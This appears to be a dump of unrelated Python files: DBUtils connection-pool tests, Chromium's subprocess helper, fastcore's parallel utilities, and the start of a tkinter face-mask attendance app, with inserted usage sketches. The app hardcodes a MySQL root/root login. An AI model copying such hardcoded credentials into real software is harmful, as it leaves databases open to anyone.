self.assertNotEqual(db1, db2) self.assertNotEqual(db1._con, db2._con) for i in range(7): db2.cursor().execute('select test') self.assertEqual(db1._con._con.num_queries, 5) self.assertEqual(db2._con._con.num_queries, 7) del db1 db1 = pool.connection() self.assertNotEqual(db1, db2) self.assertNotEqual(db1._con, db2._con) for i in range(3): db1.cursor().execute('select test') self.assertEqual(db1._con._con.num_queries, 8) db2.cursor().execute('select test') self.assertEqual(db2._con._con.num_queries, 8) pool = PooledDB(dbapi, 0, 0, 2) db1 = pool.connection() for i in range(5): db1.cursor().execute('select test') db2 = pool.connection() self.assertNotEqual(db1, db2) self.assertNotEqual(db1._con, db2._con) for i in range(7): db2.cursor().execute('select test') self.assertEqual(db1._con._con.num_queries, 5) self.assertEqual(db2._con._con.num_queries, 7) del db1 db1 = pool.connection() self.assertNotEqual(db1, db2) self.assertNotEqual(db1._con, db2._con) for i in range(3): db1.cursor().execute('select test') self.assertEqual(db1._con._con.num_queries, 8) db2.cursor().execute('select test') self.assertEqual(db2._con._con.num_queries, 8) pool = PooledDB(dbapi, 0, 0, 1) db1 = pool.connection() db2 = pool.connection() self.assertNotEqual(db1, db2) if shareable: self.assertEqual(db1._con, db2._con) else: self.assertNotEqual(db1._con, db2._con) del db1 db1 = pool.connection(False) self.assertNotEqual(db1, db2) self.assertNotEqual(db1._con, db2._con) def test_tnree_threads_two_connections(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety pool = PooledDB(dbapi, 2, 2, 0, 2, True) try: from queue import Queue, Empty except ImportError: # Python 2 from Queue import Queue, Empty queue = Queue(3) def connection(): try: queue.put(pool.connection(), 1, 1) except Exception: queue.put(pool.connection(), 1) from threading import Thread for i in range(3): Thread(target=connection).start() try: db1 = queue.get(1, 1) db2 = queue.get(1, 1) except TypeError: db1 = queue.get(1) db2 = queue.get(1) self.assertNotEqual(db1, db2) db1_con = db1._con db2_con = db2._con self.assertNotEqual(db1_con, db2_con) try: self.assertRaises(Empty, queue.get, 1, 0.1) except TypeError: self.assertRaises(Empty, queue.get, 0) del db1 try: db1 = queue.get(1, 1) except TypeError: db1 = 
queue.get(1) self.assertNotEqual(db1, db2) self.assertNotEqual(db1._con, db2._con) self.assertEqual(db1._con, db1_con) pool = PooledDB(dbapi, 2, 2, 1, 2, True) db1 = pool.connection(False) db2 = pool.connection(False) self.assertNotEqual(db1, db2) db1_con = db1._con db2_con = db2._con self.assertNotEqual(db1_con, db2_con) Thread(target=connection).start() try: self.assertRaises(Empty, queue.get, 1, 0.1) except TypeError: self.assertRaises(Empty, queue.get, 0) del db1 try: db1 = queue.get(1, 1) except TypeError: db1 = queue.get(1) self.assertNotEqual(db1, db2) self.assertNotEqual(db1._con, db2._con) self.assertEqual(db1._con, db1_con) def test_ping_check(self): Connection = dbapi.Connection Connection.has_ping = True Connection.num_pings = 0 dbapi.threadsafety = 2 pool = PooledDB(dbapi, 1, 1, 0, 0, False, None, None, True, None, 0) db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 0) db._con.close() db.close() db = pool.connection() self.assertFalse(db._con._con.valid) self.assertEqual(Connection.num_pings, 0) pool = PooledDB(dbapi, 1, 1, 1, 0, False, None, None, True, None, 0) db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 0) db._con.close() db = pool.connection() self.assertFalse(db._con._con.valid) self.assertEqual(Connection.num_pings, 0) pool = PooledDB(dbapi, 1, 1, 0, 0, False, None, None, True, None, 1) db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 1) db._con.close() db.close() db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 2) pool = PooledDB(dbapi, 1, 1, 1, 0, False, None, None, True, None, 1) db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 3) db._con.close() db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 4) pool = PooledDB(dbapi, 1, 1, 1, 0, False, None, None, True, None, 2) db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 4) db._con.close() db = pool.connection() self.assertFalse(db._con._con.valid) self.assertEqual(Connection.num_pings, 4) db.cursor() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 5) pool = PooledDB(dbapi, 1, 1, 1, 0, False, None, None, True, None, 4) db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 5) db._con.close() db = pool.connection() self.assertFalse(db._con._con.valid) self.assertEqual(Connection.num_pings, 5) cursor = db.cursor() db._con.close() self.assertFalse(db._con._con.valid) self.assertEqual(Connection.num_pings, 5) cursor.execute('select test') self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 6) Connection.has_ping = False Connection.num_pings = 0 def test_failed_transaction(self): dbapi.threadsafety = 2 pool = PooledDB(dbapi, 0, 1, 1) db = pool.connection() cursor = db.cursor() db._con._con.close() cursor.execute('select test') db.begin() db._con._con.close() self.assertRaises(dbapi.InternalError, cursor.execute, 'select test') cursor.execute('select test') db.begin() db.cancel() db._con._con.close() cursor.execute('select test') pool = PooledDB(dbapi, 1, 1, 0) db = pool.connection() cursor = db.cursor() db._con._con.close() cursor.execute('select test') db.begin() db._con._con.close() self.assertRaises(dbapi.InternalError, cursor.execute, 'select test') cursor.execute('select test') db.begin() 
db.cancel() db._con._con.close() cursor.execute('select test') def test_shared_in_transaction(self): dbapi.threadsafety = 2 pool = PooledDB(dbapi, 0, 1, 1) db = pool.connection() db.begin() pool.connection(False) self.assertRaises(TooManyConnections, pool.connection) pool = PooledDB(dbapi, 0, 2, 2) db1 = pool.connection() db2 = pool.connection() self.assertIsNot(db2._con, db1._con) db2.close() db2 = pool.connection() self.assertIsNot(db2._con, db1._con) db = pool.connection() self.assertIs(db._con, db1._con) db.close() db1.begin() db = pool.connection() self.assertIs(db._con, db2._con) db.close() db2.begin() pool.connection(False) self.assertRaises(TooManyConnections, pool.connection) db1.rollback() db = pool.connection() self.assertIs(db._con, db1._con) def test_reset_transaction(self): pool = PooledDB(dbapi, 1, 1, 0) db = pool.connection() db.begin() con = db._con self.assertTrue(con._transaction) self.assertEqual(con._con.session, ['rollback']) db.close() self.assertIs(pool.connection()._con, con) self.assertFalse(con._transaction) self.assertEqual(con._con.session, ['rollback'] * 3) pool = PooledDB(dbapi, 1, 1, 0, reset=False) db = pool.connection() db.begin() con = db._con self.assertTrue(con._transaction) self.assertEqual(con._con.session, []) db.close() self.assertIs(pool.connection()._con, con) self.assertFalse(con._transaction) self.assertEqual(con._con.session, ['rollback']) class TestSharedDBConnection(unittest.TestCase): def test_create_connection(self): db_con = dbapi.connect() con = SharedDBConnection(db_con) self.assertEqual(con.con, db_con) self.assertEqual(con.shared, 1) def test_share_and_unshare(self): con = SharedDBConnection(dbapi.connect()) self.assertEqual(con.shared, 1) con.share() self.assertEqual(con.shared, 2) con.share() self.assertEqual(con.shared, 3) con.unshare() self.assertEqual(con.shared, 2) con.unshare() self.assertEqual(con.shared, 1) def test_comparison(self): con1 = SharedDBConnection(dbapi.connect()) con1.con._transaction = False con2 = SharedDBConnection(dbapi.connect()) con2.con._transaction = False self.assertTrue(con1 == con2) self.assertTrue(con1 <= con2) self.assertTrue(con1 >= con2) self.assertFalse(con1 != con2) self.assertFalse(con1 < con2) self.assertFalse(con1 > con2) con2.share() self.assertFalse(con1 == con2) self.assertTrue(con1 <= con2) self.assertFalse(con1 >= con2) self.assertTrue(con1 != con2) self.assertTrue(con1 < con2) self.assertFalse(con1 > con2) con1.con._transaction = True self.assertFalse(con1 == con2) self.assertFalse(con1 <= con2) self.assertTrue(con1 >= con2) self.assertTrue(con1 != con2) self.assertFalse(con1 < con2) self.assertTrue(con1 > con2) if __name__ == '__main__': unittest.main()
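# Illustrative sketch, not part of the original test suite: how the PooledDB
# parameters exercised positionally above (mincached, maxcached, maxshared,
# maxconnections, blocking) are typically passed by keyword against a real
# DB-API 2 driver. The import path and the use of sqlite3 are assumptions for
# illustration only; the tests above use a mock `dbapi` module instead.
def _pooled_db_usage_sketch():
    import sqlite3
    from dbutils.pooled_db import PooledDB  # older releases: DBUtils.PooledDB
    pool = PooledDB(
        creator=sqlite3,        # DB-API 2 module used to create connections
        mincached=1,            # idle connections opened at startup
        maxcached=2,            # maximum idle connections kept in the pool
        maxshared=2,            # maximum shared connections (needs threadsafety > 1)
        maxconnections=4,       # hard cap; TooManyConnections is raised beyond it
        blocking=False,         # raise instead of waiting when the cap is hit
        database=':memory:')
    db = pool.connection()                        # shareable connection
    dedicated = pool.connection(shareable=False)  # dedicated connection
    cur = db.cursor()
    cur.execute('select 1')
    cur.close()
    dedicated.close()
    db.close()                  # returns the connection to the idle cache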
cmd_helper.py
# Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """A wrapper for subprocess to make calling shell commands easier.""" import logging import os import pipes import select import signal import string import StringIO import subprocess import sys import time logger = logging.getLogger(__name__) _SafeShellChars = frozenset(string.ascii_letters + string.digits + '@%_-+=:,./') def SingleQuote(s): """Return an shell-escaped version of the string using single quotes. Reliably quote a string which may contain unsafe characters (e.g. space, quote, or other special characters such as '$'). The returned value can be used in a shell command line as one token that gets to be interpreted literally. Args: s: The string to quote. Return: The string quoted using single quotes. """ return pipes.quote(s) def DoubleQuote(s): """Return an shell-escaped version of the string using double quotes. Reliably quote a string which may contain unsafe characters (e.g. space or quote characters), while retaining some shell features such as variable interpolation. The returned value can be used in a shell command line as one token that gets to be further interpreted by the shell. The set of characters that retain their special meaning may depend on the shell implementation. This set usually includes: '$', '`', '\', '!', '*', and '@'. Args: s: The string to quote. Return: The string quoted using double quotes. """ if not s: return '""' elif all(c in _SafeShellChars for c in s): return s else: return '"' + s.replace('"', '\\"') + '"' def ShrinkToSnippet(cmd_parts, var_name, var_value): """Constructs a shell snippet for a command using a variable to shrink it. Takes into account all quoting that needs to happen. Args: cmd_parts: A list of command arguments. var_name: The variable that holds var_value. var_value: The string to replace in cmd_parts with $var_name Returns: A shell snippet that does not include setting the variable. """ def shrink(value): parts = (x and SingleQuote(x) for x in value.split(var_value)) with_substitutions = ('"$%s"' % var_name).join(parts) return with_substitutions or "''" return ' '.join(shrink(part) for part in cmd_parts) def Popen(args, stdout=None, stderr=None, shell=None, cwd=None, env=None): # preexec_fn isn't supported on windows. if sys.platform == 'win32': close_fds = (stdout is None and stderr is None) preexec_fn = None else: close_fds = True preexec_fn = lambda: signal.signal(signal.SIGPIPE, signal.SIG_DFL) return subprocess.Popen( args=args, cwd=cwd, stdout=stdout, stderr=stderr, shell=shell, close_fds=close_fds, env=env, preexec_fn=preexec_fn) def Call(args, stdout=None, stderr=None, shell=None, cwd=None, env=None): pipe = Popen(args, stdout=stdout, stderr=stderr, shell=shell, cwd=cwd, env=env) pipe.communicate() return pipe.wait() def RunCmd(args, cwd=None): """Opens a subprocess to execute a program and returns its return value. Args: args: A string or a sequence of program arguments. The program to execute is the string or the first item in the args sequence. cwd: If not None, the subprocess's current directory will be changed to |cwd| before it's executed. Returns: Return code from the command execution. """ logger.info(str(args) + ' ' + (cwd or '')) return Call(args, cwd=cwd) def GetCmdOutput(args, cwd=None, shell=False, env=None): """Open a subprocess to execute a program and returns its output. Args: args: A string or a sequence of program arguments. 
The program to execute is the string or the first item in the args sequence. cwd: If not None, the subprocess's current directory will be changed to |cwd| before it's executed. shell: Whether to execute args as a shell command. env: If not None, a mapping that defines environment variables for the subprocess. Returns: Captures and returns the command's stdout. Prints the command's stderr to logger (which defaults to stdout). """ (_, output) = GetCmdStatusAndOutput(args, cwd, shell, env) return output def _ValidateAndLogCommand(args, cwd, shell): if isinstance(args, basestring): if not shell: raise Exception('string args must be run with shell=True') else: if shell: raise Exception('array args must be run with shell=False') args = ' '.join(SingleQuote(c) for c in args) if cwd is None: cwd = '' else: cwd = ':' + cwd logger.info('[host]%s> %s', cwd, args) return args def GetCmdStatusAndOutput(args, cwd=None, shell=False, env=None): """Executes a subprocess and returns its exit code and output. Args: args: A string or a sequence of program arguments. The program to execute is the string or the first item in the args sequence. cwd: If not None, the subprocess's current directory will be changed to |cwd| before it's executed. shell: Whether to execute args as a shell command. Must be True if args is a string and False if args is a sequence. env: If not None, a mapping that defines environment variables for the subprocess. Returns: The 2-tuple (exit code, stdout). """ status, stdout, stderr = GetCmdStatusOutputAndError( args, cwd=cwd, shell=shell, env=env) if stderr: logger.critical('STDERR: %s', stderr) logger.debug('STDOUT: %s%s', stdout[:4096].rstrip(), '<truncated>' if len(stdout) > 4096 else '') return (status, stdout) def StartCmd(args, cwd=None, shell=False, env=None): """Starts a subprocess and returns a handle to the process. Args: args: A string or a sequence of program arguments. The program to execute is the string or the first item in the args sequence. cwd: If not None, the subprocess's current directory will be changed to |cwd| before it's executed. shell: Whether to execute args as a shell command. Must be True if args is a string and False if args is a sequence. env: If not None, a mapping that defines environment variables for the subprocess. Returns: A process handle from subprocess.Popen. """ _ValidateAndLogCommand(args, cwd, shell) return Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=shell, cwd=cwd, env=env) def GetCmdStatusOutputAndError(args, cwd=None, shell=False, env=None): """Executes a subprocess and returns its exit code, output, and errors. Args: args: A string or a sequence of program arguments. The program to execute is the string or the first item in the args sequence. cwd: If not None, the subprocess's current directory will be changed to |cwd| before it's executed. shell: Whether to execute args as a shell command. Must be True if args is a string and False if args is a sequence. env: If not None, a mapping that defines environment variables for the subprocess. Returns: The 3-tuple (exit code, stdout, stderr). 
""" _ValidateAndLogCommand(args, cwd, shell) pipe = Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=shell, cwd=cwd, env=env) stdout, stderr = pipe.communicate() return (pipe.returncode, stdout, stderr) class TimeoutError(Exception): """Module-specific timeout exception.""" def __init__(self, output=None): super(TimeoutError, self).__init__() self._output = output @property def output(self): return self._output def _IterProcessStdoutFcntl( process, iter_timeout=None, timeout=None, buffer_size=4096, poll_interval=1): """An fcntl-based implementation of _IterProcessStdout.""" # pylint: disable=too-many-nested-blocks import fcntl try: # Enable non-blocking reads from the child's stdout. child_fd = process.stdout.fileno() fl = fcntl.fcntl(child_fd, fcntl.F_GETFL) fcntl.fcntl(child_fd, fcntl.F_SETFL, fl | os.O_NONBLOCK) end_time = (time.time() + timeout) if timeout else None iter_end_time = (time.time() + iter_timeout) if iter_timeout else None while True: if end_time and time.time() > end_time: raise TimeoutError() if iter_end_time and time.time() > iter_end_time: yield None iter_end_time = time.time() + iter_timeout if iter_end_time: iter_aware_poll_interval = min( poll_interval, max(0, iter_end_time - time.time())) else: iter_aware_poll_interval = poll_interval read_fds, _, _ = select.select( [child_fd], [], [], iter_aware_poll_interval) if child_fd in read_fds: data = os.read(child_fd, buffer_size) if not data: break yield data if process.poll() is not None: # If process is closed, keep checking for output data (because of timing # issues). while True: read_fds, _, _ = select.select( [child_fd], [], [], iter_aware_poll_interval) if child_fd in read_fds: data = os.read(child_fd, buffer_size) if data: yield data continue break break finally: try: if process.returncode is None: # Make sure the process doesn't stick around if we fail with an # exception. process.kill() except OSError: pass process.wait() def _IterProcessStdoutQueue( process, iter_timeout=None, timeout=None, buffer_size=4096, poll_interval=1): """A Queue.Queue-based implementation of _IterProcessStdout. TODO(jbudorick): Evaluate whether this is a suitable replacement for _IterProcessStdoutFcntl on all platforms. """ # pylint: disable=unused-argument import Queue import threading stdout_queue = Queue.Queue() def read_process_stdout(): # TODO(jbudorick): Pick an appropriate read size here. while True: try: output_chunk = os.read(process.stdout.fileno(), buffer_size) except IOError: break stdout_queue.put(output_chunk, True) if not output_chunk and process.poll() is not None: break reader_thread = threading.Thread(target=read_process_stdout) reader_thread.start() end_time = (time.time() + timeout) if timeout else None try: while True: if end_time and time.time() > end_time: raise TimeoutError() try: s = stdout_queue.get(True, iter_timeout) if not s: break yield s except Queue.Empty: yield None finally: try: if process.returncode is None: # Make sure the process doesn't stick around if we fail with an # exception. process.kill() except OSError: pass process.wait() reader_thread.join() _IterProcessStdout = ( _IterProcessStdoutQueue if sys.platform == 'win32' else _IterProcessStdoutFcntl) """Iterate over a process's stdout. This is intentionally not public. Args: process: The process in question. iter_timeout: An optional length of time, in seconds, to wait in between each iteration. If no output is received in the given time, this generator will yield None. 
timeout: An optional length of time, in seconds, during which the process must finish. If it fails to do so, a TimeoutError will be raised. buffer_size: The maximum number of bytes to read (and thus yield) at once. poll_interval: The length of time to wait in calls to `select.select`. If iter_timeout is set, the remaining length of time in the iteration may take precedence. Raises: TimeoutError: if timeout is set and the process does not complete. Yields: basestrings of data or None. """ def GetCmdStatusAndOutputWithTimeout(args, timeout, cwd=None, shell=False, logfile=None, env=None): """Executes a subprocess with a timeout. Args: args: List of arguments to the program, the program to execute is the first element. timeout: the timeout in seconds or None to wait forever. cwd: If not None, the subprocess's current directory will be changed to |cwd| before it's executed. shell: Whether to execute args as a shell command. Must be True if args is a string and False if args is a sequence. logfile: Optional file-like object that will receive output from the command as it is running. env: If not None, a mapping that defines environment variables for the subprocess. Returns: The 2-tuple (exit code, output). Raises: TimeoutError on timeout. """ _ValidateAndLogCommand(args, cwd, shell) output = StringIO.StringIO() process = Popen(args, cwd=cwd, shell=shell, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env) try: for data in _IterProcessStdout(process, timeout=timeout): if logfile: logfile.write(data) output.write(data) except TimeoutError: raise TimeoutError(output.getvalue()) str_output = output.getvalue() logger.debug('STDOUT+STDERR: %s%s', str_output[:4096].rstrip(), '<truncated>' if len(str_output) > 4096 else '') return process.returncode, str_output def IterCmdOutputLines(args, iter_timeout=None, timeout=None, cwd=None, shell=False, env=None, check_status=True): """Executes a subprocess and continuously yields lines from its output. Args: args: List of arguments to the program, the program to execute is the first element. iter_timeout: Timeout for each iteration, in seconds. timeout: Timeout for the entire command, in seconds. cwd: If not None, the subprocess's current directory will be changed to |cwd| before it's executed. shell: Whether to execute args as a shell command. Must be True if args is a string and False if args is a sequence. env: If not None, a mapping that defines environment variables for the subprocess. check_status: A boolean indicating whether to check the exit status of the process after all output has been read. Yields: The output of the subprocess, line by line. Raises: CalledProcessError if check_status is True and the process exited with a non-zero exit status. """ cmd = _ValidateAndLogCommand(args, cwd, shell) process = Popen(args, cwd=cwd, shell=shell, env=env, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) return _IterCmdOutputLines( process, cmd, iter_timeout=iter_timeout, timeout=timeout, check_status=check_status) def _IterCmdOutputLines(process, cmd, iter_timeout=None, timeout=None, check_status=True): buffer_output = '' iter_end = None cur_iter_timeout = None if iter_timeout: iter_end = time.time() + iter_timeout cur_iter_timeout = iter_timeout for data in _IterProcessStdout(process, iter_timeout=cur_iter_timeout, timeout=timeout): if iter_timeout: # Check whether the current iteration has timed out. 
cur_iter_timeout = iter_end - time.time() if data is None or cur_iter_timeout < 0: yield None iter_end = time.time() + iter_timeout continue else: assert data is not None, ( 'Iteration received no data despite no iter_timeout being set. ' 'cmd: %s' % cmd) # Construct lines to yield from raw data. buffer_output += data has_incomplete_line = buffer_output[-1] not in '\r\n' lines = buffer_output.splitlines() buffer_output = lines.pop() if has_incomplete_line else '' for line in lines: yield line if iter_timeout: iter_end = time.time() + iter_timeout if buffer_output: yield buffer_output if check_status and process.returncode: raise subprocess.CalledProcessError(process.returncode, cmd)
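# Illustrative usage sketch, not part of the original module: how the helpers
# defined above compose. The commands, timeouts and paths are placeholders
# chosen for the example only.
def _cmd_helper_usage_example():
  # One-shot execution: returns (exit code, stdout); stderr goes to the logger.
  status, out = GetCmdStatusAndOutput(['echo', 'hello'])
  assert status == 0 and out.strip() == 'hello'

  # Streaming execution: lines are yielded as they are produced. With an
  # iter_timeout set, a yielded None means that iteration saw no new output.
  for line in IterCmdOutputLines(['uname', '-a'], iter_timeout=1, timeout=30):
    if line is None:
      continue
    logger.info('got line: %s', line)

  # Quoting helpers: build a shell snippet that substitutes a variable for a
  # repeated value while keeping everything else safely quoted.
  snippet = ShrinkToSnippet(['cp', '/tmp/foo', '/tmp/foo.bak'], 'f', '/tmp/foo')
  assert snippet == 'cp "$f" "$f".bak'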
parallel.py
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/03a_parallel.ipynb (unless otherwise specified).

__all__ = ['threaded', 'startthread', 'set_num_threads', 'check_parallel_num', 'ThreadPoolExecutor',
           'ProcessPoolExecutor', 'parallel', 'run_procs', 'parallel_gen']

# Cell
from .imports import *
from .foundation import *
from .basics import *
from .xtras import *
from functools import wraps
# from contextlib import contextmanager,ExitStack
from multiprocessing import Process, Queue
import concurrent.futures,time
from multiprocessing import Manager, set_start_method
from threading import Thread

try:
    if sys.platform == 'darwin': set_start_method("fork")
except: pass

# Cell
def threaded(f):
    "Run `f` in a thread, and returns the thread"
    @wraps(f)
    def _f(*args, **kwargs):
        res = Thread(target=f, args=args, kwargs=kwargs)
        res.start()
        return res
    return _f

# Cell
def startthread(f):
    "Like `threaded`, but start thread immediately"
    threaded(f)()

# Cell
def set_num_threads(nt):
    "Get numpy (and others) to use `nt` threads"
    try: import mkl; mkl.set_num_threads(nt)
    except: pass
    try: import torch; torch.set_num_threads(nt)
    except: pass
    os.environ['IPC_ENABLE']='1'
    for o in ['OPENBLAS_NUM_THREADS','NUMEXPR_NUM_THREADS','OMP_NUM_THREADS','MKL_NUM_THREADS']:
        os.environ[o] = str(nt)

# Cell
def _call(lock, pause, n, g, item):
    l = False
    if pause:
        try:
            l = lock.acquire(timeout=pause*(n+2))
            time.sleep(pause)
        finally:
            if l: lock.release()
    return g(item)

# Cell
def check_parallel_num(param_name, num_workers):
    if sys.platform == "win32" and IN_NOTEBOOK and num_workers > 0:
        print("Due to IPython and Windows limitation, python multiprocessing isn't available now.")
        print(f"So `{param_name}` is changed to 0 to avoid getting stuck")
        num_workers = 0
    return num_workers

# Cell
class ThreadPoolExecutor(concurrent.futures.ThreadPoolExecutor):
    "Same as Python's ThreadPoolExecutor, except can pass `max_workers==0` for serial execution"
    def __init__(self, max_workers=defaults.cpus, on_exc=print, pause=0, **kwargs):
        if max_workers is None: max_workers=defaults.cpus
        store_attr()
        self.not_parallel = max_workers==0
        if self.not_parallel: max_workers=1
        super().__init__(max_workers, **kwargs)

    def map(self, f, items, *args, timeout=None, chunksize=1, **kwargs):
        if self.not_parallel == False: self.lock = Manager().Lock()
        g = partial(f, *args, **kwargs)
        if self.not_parallel: return map(g, items)
        _g = partial(_call, self.lock, self.pause, self.max_workers, g)
        try: return super().map(_g, items, timeout=timeout, chunksize=chunksize)
        except Exception as e: self.on_exc(e)

# Cell
class ProcessPoolExecutor(concurrent.futures.ProcessPoolExecutor):
    "Same as Python's ProcessPoolExecutor, except can pass `max_workers==0` for serial execution"
    def __init__(self, max_workers=defaults.cpus, on_exc=print, pause=0, **kwargs):
        if max_workers is None: max_workers=defaults.cpus
        max_workers = check_parallel_num('max_workers', max_workers)
        store_attr()
        self.not_parallel = max_workers==0
        if self.not_parallel: max_workers=1
        super().__init__(max_workers, **kwargs)

    def map(self, f, items, *args, timeout=None, chunksize=1, **kwargs):
        if self.not_parallel == False: self.lock = Manager().Lock()
        g = partial(f, *args, **kwargs)
        if self.not_parallel: return map(g, items)
        _g = partial(_call, self.lock, self.pause, self.max_workers, g)
        try: return super().map(_g, items, timeout=timeout, chunksize=chunksize)
        except Exception as e: self.on_exc(e)

# Cell
try: from fastprogress import progress_bar
except: progress_bar = None

# Cell
def parallel(f, items, *args, n_workers=defaults.cpus, total=None, progress=None, pause=0,
             threadpool=False, timeout=None, chunksize=1, **kwargs):
    "Applies `func` in parallel to `items`, using `n_workers`"
    pool = ThreadPoolExecutor if threadpool else ProcessPoolExecutor
    with pool(n_workers, pause=pause) as ex:
        r = ex.map(f,items, *args, timeout=timeout, chunksize=chunksize, **kwargs)
        if progress and progress_bar:
            if total is None: total = len(items)
            r = progress_bar(r, total=total, leave=False)
        return L(r)

# Cell
def run_procs(f, f_done, args):
    "Call `f` for each item in `args` in parallel, yielding `f_done`"
    processes = L(args).map(Process, args=arg0, target=f)
    for o in processes: o.start()
    yield from f_done()
    processes.map(Self.join())

# Cell
def _f_pg(obj, queue, batch, start_idx):
    for i,b in enumerate(obj(batch)): queue.put((start_idx+i,b))

def _done_pg(queue, items): return (queue.get() for _ in items)

# Cell
def parallel_gen(cls, items, n_workers=defaults.cpus, **kwargs):
    "Instantiate `cls` in `n_workers` procs & call each on a subset of `items` in parallel."
    n_workers = check_parallel_num('n_workers', n_workers)
    if n_workers==0:
        yield from enumerate(list(cls(**kwargs)(items)))
        return
    batches = L(chunked(items, n_chunks=n_workers))
    idx = L(itertools.accumulate(0 + batches.map(len)))
    queue = Queue()
    if progress_bar: items = progress_bar(items, leave=False)
    f=partial(_f_pg, cls(**kwargs), queue)
    done=partial(_done_pg, queue, items)
    yield from run_procs(f, done, L(batches,idx).zip())
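# Illustrative usage sketch, not part of the original notebook export: how
# `parallel` and `parallel_gen` above are typically called. The worker function
# and class below are placeholders; thread / serial settings are used so the
# sketch does not depend on picklable top-level workers.
def _parallel_usage_sketch():
    def _square(x): return x*x
    # Run `_square` over the items with 2 threads (threadpool=True avoids the
    # pickling requirements of process pools for this locally defined worker).
    res = parallel(_square, range(8), n_workers=2, threadpool=True, progress=False)
    assert list(res) == [x*x for x in range(8)]

    class _Adder:
        # `parallel_gen` instantiates this class (once per worker when
        # n_workers > 0) and calls the instance on a chunk of `items`.
        def __init__(self, delta=1): self.delta = delta
        def __call__(self, batch): return [x + self.delta for x in batch]

    # n_workers=0 takes the serial path, so the locally defined class is fine;
    # the generator yields (index, result) pairs.
    out = dict(parallel_gen(_Adder, range(8), n_workers=0, delta=10))
    assert out == {i: i + 10 for i in range(8)}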
run.py
import tkinter as tk from tkinter import * import cv2, os # import mysql.connector import shutil import csv import numpy as np from PIL import Image, ImageTk import pandas as pd import datetime import time import tkinter.ttk as ttk import tkinter.font as font from tensorflow.keras.applications.mobilenet_v2 import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.models import load_model from imutils.video import VideoStream import numpy as np import argparse import imutils import json import cv2 import os import requests import pywhatkit as kit from threading import Thread import mysql.connector mydb = mysql.connector.connect(host="localhost",user="root",passwd="root",database="attendify1") mycursor = mydb.cursor() def whatsapp(number,hour,min): # #data = pd.read_csv("Attendance\Attendance_" + date + ".csv") # data_dict = data.to_dict('list') # leads = data_dict['Number'] # print (leads) # # # # text = 'hey how are you...' # # j = 0 # for i in leads: # # # mini = int(min) + 2 + j # kit.sendwhatmsg("+91" + number, text, int(hour), mini) # j = j + 1 # #list kit.sendwhatmsg("+91" + number, "Hey your attendances has been recorded", int(hour), int(min) + 2) root = Tk() root.title("Iem AI Based Attendence System") canvas = Canvas(root, width=2250, height=1280) image = ImageTk.PhotoImage(Image.open("Images\\background.png")) canvas.create_image(5, 5, anchor=NW, image=image) canvas.pack() root.grid_rowconfigure(0, weight=1) root.grid_columnconfigure(0, weight=1) id2 = tk.Label(root, text="* Additional Covid 19 Feature", font=('times', 15, ' bold ')) id2.place(x=80, y=390) id1 = tk.Label(root, text="Enter ID", width=10, height=1, fg="black", bg="white", font=('times', 15, ' bold ')) id1.place(x=375, y=250) txt1 = tk.Entry(root, width=30, bg="white", fg="black", font=('times', 12, ' ')) txt1.place(x=400, y=290) name1 = tk.Label(root, text="Enter Name", width=10, height=1, fg="black", bg="white", font=('times', 15, ' bold ')) name1.place(x=390, y=330) txt2 = tk.Entry(root, width=30, bg="white", fg="black", font=('times', 12, ' ')) txt2.place(x=400, y=370) ph1 = tk.Label(root, text="Parent's Phone Number", width=20, height=1, fg="black", bg="white", font=('times', 15, 'bold')) ph1.place(x=380, y=410) txt3 = tk.Entry(root, width=30, bg="white", fg="black", font=('times', 12, ' ')) txt3.place(x=400, y=450) message2 = tk.Label(root, text="", fg="black", bg="white", font=('times', 15, ' bold ')) message2.place(x=700, y=650) def maskdetor(): def detect_and_predict_mask(frame, faceNet, maskNet): # grab the dimensions of the frame and then construct a blob # from it (h, w) = frame.shape[:2] blob = cv2.dnn.blobFromImage(frame, 1.0, (300, 300), (104.0, 177.0, 123.0)) # pass the blob through the network and obtain the face detections faceNet.setInput(blob) detections = faceNet.forward() # initialize our list of faces, their corresponding locations, # and the list of predictions from our face mask network faces = [] locs = [] preds = [] # loop over the detections for i in range(0, detections.shape[2]): # extract the confidence (i.e., probability) associated with # the detection confidence = detections[0, 0, i, 2] # filter out weak detections by ensuring the confidence is # greater than the minimum confidence if confidence > args["confidence"]: # compute the (x, y)-coordinates of the bounding box for # the object box = detections[0, 0, i, 3:7] * np.array([w, h, w, h]) (startX, startY, endX, endY) = box.astype("int") # ensure the bounding boxes fall within the 
dimensions of # the frame (startX, startY) = (max(0, startX), max(0, startY)) (endX, endY) = (min(w - 1, endX), min(h - 1, endY)) # extract the face ROI, convert it from BGR to RGB channel # ordering, resize it to 224x224, and preprocess it face = frame[startY:endY, startX:endX] face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB) face = cv2.resize(face, (224, 224)) face = img_to_array(face) face = preprocess_input(face) # add the face and bounding boxes to their respective # lists faces.append(face) locs.append((startX, startY, endX, endY)) # only make a predictions if at least one face was detected if len(faces) > 0: # for faster inference we'll make batch predictions on *all* # faces at the same time rather than one-by-one predictions # in the above `for` loop faces = np.array(faces, dtype="float32") preds = maskNet.predict(faces, batch_size=32) # return a 2-tuple of the face locations and their corresponding # locations return (locs, preds) # construct the argument parser and parse the arguments ap = argparse.ArgumentParser() ap.add_argument("-f", "--face", type=str, default="face_detector", help="path to face detector model directory") ap.add_argument("-m", "--model", type=str, default="mask_detector.model", help="path to trained face mask detector model") ap.add_argument("-c", 